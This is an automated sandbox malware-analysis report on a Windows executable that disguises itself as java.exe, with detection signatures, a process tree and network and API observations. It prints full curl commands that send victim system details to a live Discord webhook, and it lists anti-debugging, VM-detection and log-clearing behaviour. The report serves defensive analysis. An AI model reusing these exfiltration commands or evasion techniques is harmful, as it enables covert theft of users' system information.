Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Jx6bD8nM4qW9sL3v.exe

Overview

General Information

Sample name:Jx6bD8nM4qW9sL3v.exe
Analysis ID:1582327
MD5:e181eb699888d8bbbe0b89d41df77678
SHA1:9a500deadf901dfb3f63df1ab2cbc679b27fc660
SHA256:86c52e999cfd2243ea8e81e6ff8b1c6e15ee176807c7911d5a000341200eb757
Tags:exeuser-juroots
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Exploit detected, runtime environment starts unknown processes
Sigma detected: Suspicious Processes Spawned by Java.EXE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • Jx6bD8nM4qW9sL3v.exe (PID: 6052 cmdline: "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe" MD5: E181EB699888D8BBBE0B89D41DF77678)
    • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 5776 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 4196 cmdline: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • java.exe (PID: 6400 cmdline: C:\Users\user\AppData\Local\java.exe MD5: E181EB699888D8BBBE0B89D41DF77678)
    • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1812 cmdline: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 4144 cmdline: curl -s https://api.ipify.org MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 3128 cmdline: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Processes Spawned by Java.EXE
Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Florian Roth: Data: Command: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, CommandLine: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Users\user\AppData\Local\java.exe, ParentImage: C:\Users\user\AppData\Local\java.exe, ParentProcessId: 6400, ParentProcessName: java.exe, ProcessCommandLine: curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm, ProcessId: 3128, ProcessName: curl.exe
Sigma detected: Shell Process Spawned by Java.EXE
Source: Process startedAuthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: Data: Command: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\java.exe, ParentImage: C:\Users\user\AppData\Local\java.exe, ParentProcessId: 6400, ParentProcessName: java.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, ProcessId: 1812, ProcessName: cmd.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe", ParentImage: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe, ParentProcessId: 6052, ParentProcessName: Jx6bD8nM4qW9sL3v.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org, ProcessId: 6604, ProcessName: cmd.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\java.exeReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: Jx6bD8nM4qW9sL3v.exeReversingLabs: Detection: 47%
Source: Jx6bD8nM4qW9sL3v.exeVirustotal: Detection: 54%Perma Link
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC6000 CryptStringToBinaryA,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_CxxThrowException,0_2_00007FF670FC6000
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F6000 CryptStringToBinaryA,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_CxxThrowException,6_2_00007FF65E1F6000
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Local\java.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC1780 GetLogicalDriveStringsA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,GetDriveTypeA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF670FC1780

Software Vulnerabilities

barindex
Exploit detected, runtime environment starts unknown processes
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\conhost.exe
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 483
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.se1
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTime
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, 00000000.00000003.2018730241.000002597BC1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootI
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: curl.exe, 00000009.00000002.2051339309.000002C6CC54A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmp, Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://api.ipify.org
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/Item
Source: java.exe, 00000006.00000002.2060240613.0000022751ECB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org2
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org7
Source: Jx6bD8nM4qW9sL3v.exe, 00000000.00000002.2034490132.000002597BC07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org9
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9648000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org?
Source: curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgL
Source: curl.exe, 00000003.00000002.2025529355.0000018EE9630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgWinsta0
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://api.ipify.orgcurl
Source: curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2051327029.000002C6CC528000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051239188.000002C6CC527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgvB
Source: curl.exe, 00000009.00000002.2051301631.000002C6CC510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgwinsta0
Source: java.exe, 00000006.00000002.2060240613.0000022751EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org~
Source: curl.exe, 00000005.00000002.2033796989.0000015BFD279000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059642518.00000269500F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooK
Source: curl.exe, 0000000A.00000002.2059832303.00000269500E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU
Source: Jx6bD8nM4qW9sL3v.exe, java.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC42B0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,6_2_00007FF65E1F3FEA
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,6_2_00007FF65E1F42B0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC42B00_2_00007FF670FC42B0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC49900_2_00007FF670FC4990
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC7E100_2_00007FF670FC7E10
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC70A00_2_00007FF670FC70A0
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC64400_2_00007FF670FC6440
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC94690_2_00007FF670FC9469
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC5BF00_2_00007FF670FC5BF0
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F70A06_2_00007FF65E1F70A0
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F49906_2_00007FF65E1F4990
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F7E106_2_00007FF65E1F7E10
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F42B06_2_00007FF65E1F42B0
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F5BF06_2_00007FF65E1F5BF0
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F94696_2_00007FF65E1F9469
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1F64406_2_00007FF65E1F6440
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess token adjusted: SecurityJump to behavior
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: invalid certificate
